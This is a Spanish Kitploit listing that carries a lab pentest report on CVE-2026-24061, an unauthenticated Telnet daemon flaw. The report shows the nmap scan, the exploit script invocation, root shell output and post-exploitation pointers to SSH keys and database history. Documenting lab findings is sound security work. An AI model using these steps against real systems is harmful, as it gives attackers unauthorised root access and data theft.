Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CyberhawksLab-telnetCVE — Informe/hallazgo de CVE-2026-24061 dentro del laboratorio Cyberhawks | Kitploit
Herramientas/GitHubGitHub/skyejacobson/cyberhawkslab-telnetcve
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHubskyejacobson/cyberhawkslab-telnetcve

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

CyberhawksLab-telnetCVE

Informe/hallazgo de CVE-2026-24061 dentro del laboratorio Cyberhawks

Ver Repositorio
1hace 1 díaAún no revisado
Compartir

Informe de hallazgos del laboratorio demo de CyberHawks

Créditos: @SafeBreach-Labs

CVE: CVE-2026-24061

Laboratorio: Cyberhawks Lab
Objetivo: 10.1.1.1 (demo.cyberhawks.lab)
ID del hallazgo: WU-08
Fecha: 2026-09-08
Severidad: Crítica
Estado: Confirmado / Explotado


Resumen Ejecutivo

Durante una evaluación del entorno de laboratorio de Cyberhawks, se identificó y explotó con éxito una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en el host objetivo (10.1.1.1). La explotación de CVE-2026-24061 a través de un servicio Telnet expuesto (TCP/23) resultó en una shell interactiva con privilegios de root, otorgando control administrativo total sobre el sistema.


Alcance y Entorno

CampoValor
IP del objetivo10.1.1.1

Reconocimiento

Escaneo de puertos

Se realizó un escaneo de versiones de servicios con Nmap contra el objetivo para enumerar puertos y servicios abiertos.

Comando:

root@kitploit:~
nmap -sV 10.1.1.1

Resumen de resultados:

Observaciones notables:

  • El host expone una superficie de ataque amplia y preocupante en 15 puertos.
  • El puerto 23 (Telnet) era accesible, lo que lo convierte en un objetivo prioritario inmediato.
  • La presencia de Telnet — un protocolo inherentemente inseguro y en texto plano — en cualquier host moderno representa una configuración incorrecta crítica. Es probable que la versión del servicio sea explotable.

Detalles de la vulnerabilidad

Descripción

CVE-2026-24061 es una vulnerabilidad de Ejecución Remota de Código no autenticada que afecta al componente del daemon Telnet de GNU inetutils 2.6. La explotación permite a un atacante remoto no autenticado ejecutar comandos arbitrarios en el sistema objetivo con los privilegios del servicio en ejecución — en este caso, root.


Explotación

Herramienta / Exploit utilizado

Se ejecutó un script de exploit en Python creado específicamente (telnet_rce.py) dirigido a CVE-2026-24061 contra el servicio Telnet vulnerable.

Comando:

root@kitploit:~
python3 telnet_rce.py 10.1.1.1

Salida del exploit:

root@kitploit:~
[*] Connected to 10.1.1.1:23
[*] Interactive session started. Use Ctrl+C to quit.

Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)

root@demo:~#

Verificación posterior a la explotación

Tras obtener una shell, los siguientes comandos confirmaron el nivel de acceso alcanzado:

Verificación de identidad:

root@kitploit:~
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)

Enumeración del sistema de archivos:

root@kitploit:~
root@demo:~# ls -la
total 36
drwx------  6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r--  1 root root  607 May 12  2025 .bashrc
drwx------  4 root root 4096 Sep  6  2025 .cache
drwxr-xr-x  3 root root 4096 Sep  6  2025 .config
drwxrwxr-x  3 root root 4096 Sep  6  2025 .local
-rw-------  1 root root  261 Sep  6  2025 .mariadb_history
-rw-r--r--  1 root root  132 May 12  2025 .profile
drwx------  2 root root 4096 Sep  6  2025 .ssh

Verificación de la versión del servicio

root@kitploit:~
root@demo:~# telnet --version

telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

Hallazgos clave posteriores a la explotación:

  • .mariadb_history — indica uso activo de la base de datos MariaDB; potencial para una mayor recolección de credenciales o exfiltración de datos.
  • Directorio .ssh/ — puede contener claves privadas utilizables para movimiento lateral hacia otros hosts.
  • Se confirmó acceso completo de root (UID 0) sin necesidad de ningún paso de escalada de privilegios.

Impacto

CategoríaEvaluación
ConfidencialidadCrítica — todos los datos del sistema son accesibles
IntegridadCrítica — el atacante puede modificar o destruir cualquier dato
DisponibilidadCrítica — el atacante puede terminar servicios o bloquear el sistema

Se logró el compromiso total del sistema en un único paso no autenticado. Un atacante con acceso a este segmento de red podría:

  • Leer, modificar o exfiltrar todos los datos almacenados en el host.
  • Recolectar credenciales del historial de la shell, archivos de configuración y la base de datos MariaDB.
  • Usar claves SSH para pivotar lateralmente hacia otros hosts de la red.
  • Establecer persistencia (p. ej., cuentas de backdoor, trabajos cron, rootkits).
  • Interrumpir la disponibilidad de todos los servicios que se ejecutan en el host.

Recomendaciones

Inmediatas (Prioridad crítica)

  1. Aplicar parche o mitigar CVE-2026-24061 — Aplique el parche proporcionado por el proveedor para GNU inetutils si Telnet debe permanecer en uso. Verifique si hay un paquete actualizado:
    root@kitploit:~
    apt update && apt install inetutils-telnetd
    

Artefactos y Evidencia

ArtefactoDescripción
Salida del escaneo de NmapEnumeración completa de puertos/servicios de 10.1.1.1
telnet_rce.pyScript de exploit utilizado para desencadenar CVE-2026-24061
Registro de sesión de shellTranscripción de la shell interactiva de root

Informe preparado para Cyberhawks Lab — solo con fines educativos.

Descargar herramienta
Nombre de host del objetivodemo.cyberhawks.lab
Sistema operativoLinux 6.12.41+deb13-amd64 (Debian 13)
SO del atacanteParrot OS
Tipo de evaluaciónPrueba de penetración (Entorno de laboratorio)
PuertoEstadoServicio
21/tcpAbiertoFTP (tcpwrapped)
22/tcpAbiertoSSH (tcpwrapped)
23/tcpAbiertoTelnet
25/tcpAbiertoSMTP (tcpwrapped)
53/tcpAbiertoDNS (tcpwrapped)
80/tcpAbiertoHTTP (tcpwrapped)
110/tcpAbiertoPOP3 (tcpwrapped)
111/tcpAbiertoRPC (tcpwrapped)
139/tcpAbiertoNetBIOS (tcpwrapped)
143/tcpAbiertoIMAP (tcpwrapped)
445/tcpAbiertoSMB (tcpwrapped)
2049/tcpAbiertoNFS (tcpwrapped)
3306/tcpAbiertoMySQL/MariaDB (tcpwrapped)
3389/tcpAbiertoRDP (tcpwrapped)
5901/tcpAbiertoVNC (tcpwrapped)
CampoDetalle
CVECVE-2026-24061
Servicio afectadoTelnet (GNU inetutils 2.6, TCP/23)
Tipo de vulnerabilidadEjecución Remota de Código (RCE) no autenticada
Puntuación CVSSCrítica
Autenticación requeridaNinguna
Interacción del usuario requeridaNinguna